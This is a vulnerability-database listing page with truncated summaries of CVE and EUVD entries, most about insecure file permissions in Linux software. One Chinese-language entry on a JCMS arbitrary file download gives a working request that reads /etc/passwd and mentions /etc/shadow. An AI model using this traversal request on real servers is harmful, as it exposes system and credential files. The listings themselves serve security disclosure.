CVE-2026-50267

Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. In Steeltoe.Configuration.Abstractions 4.0.0 through 4.1.0, when MySQL or PostgreSQL service bindings from VCAPSERVICES include TLS client credentials, the Connectors libra...

EUVD-2004-1772

Malware in sbrugna...

EUVD-1999-1149

Malware in sbrugna...

EUVD-2004-0586

Malware in sbrugna...

EUVD-2007-6560

Malware in sbrugna...

Palo Alto Networks GlobalProtect 安全漏洞

Palo Alto Networks GlobalProtect is a suite of network protection software from Palo Alto Networks, USA. The software provides features such as firewall monitoring and threat prevention. A security vulnerability exists in Palo Alto Networks GlobalProtect, which stems from an improper assignment o...

CVE-2024-13188

A vulnerability was found in MicroWorld eScan Antivirus 7.0.32 on Linux. It has been rated as critical. Affected by this issue is some unknown functionality of the file /opt/MicroWorld/var/ of the component Installation Handler. The manipulation leads to incorrect default permissions. The attack...

CVE-2025-32915 Sensitive data exposed during automatic agent updates

Packages downloaded by Checkmk's automatic agent updates on Linux and Solaris have incorrect permissions in Checkmk 2.4.0p1, 2.3.0p32, 2.2.0p42 and = 2.1.0p49 EOL. This allows a local attacker to read sensitive data...

Security fix for the ALT Linux 10 package thunderbird version 91.0-alt1

Aug. 12, 2021 Andrey Cherepanov 91.0-alt1 - New version. - Security fixes: + CVE-2021-29986 Race condition when resolving DNS names could have led to memory corruption + CVE-2021-29981 Live range splitting could have led to conflicting assignments in the JIT + CVE-2021-29988 Memory corruption as ...

CVE-2020-1998

An improper authorization vulnerability in PAN-OS that mistakenly uses the permissions of local linux users instead of the intended SAML permissions of the account when the username is shared for the purposes of SSO authentication. This can result in authentication bypass and unintended resource...

大汉网络JCMS module/voting/down.jsp任意文件下载

权限没设置好，导致可以枚举文件名下载文件 /jcms/m5e/module/voting/down.jsp?filename=username&pathfile=/etc/passwd pathfile就对着自己的linux输入就行了，这里测试了几个 /etc/shadow /etc/shadow...

Design/Logic Flaw

wexport.c in XWine 1.0.1 on Debian GNU/Linux sets insecure permissions 0666 for /etc/wine/config, which might allow local users to execute arbitrary commands or cause a denial of service by modifying the file...

DEBIAN-CVE-2007-5028

Dibbler 0.6.0 on Linux uses weak world-writable permissions for unspecified files in /var/lib/dibbler, which has unknown impact and local attack vectors...

[Full-Disclosure] iDEFENSE Security Advisory 05.12.04: Opera Telnet URI Handler File Creation/Truncation Vulnerability

Opera Telnet URI Handler File Creation/Truncation Vulnerability iDEFENSE Security Advisory 05.12.04 www.idefense.com/application/poi/display?id=104&type=vulnerabilities May 12, 2004 I. BACKGROUND Opera is a cross-platform web browser. More information is available from http://www.opera.com/ II...

CVE-2000-0145

The libguile.so library file used by gnucash in Debian GNU/Linux is installed with world-writable permissions...

CVE-1999-0426

The default permissions of /dev/kmem in Linux versions before 2.0.36 allows IP spoofing...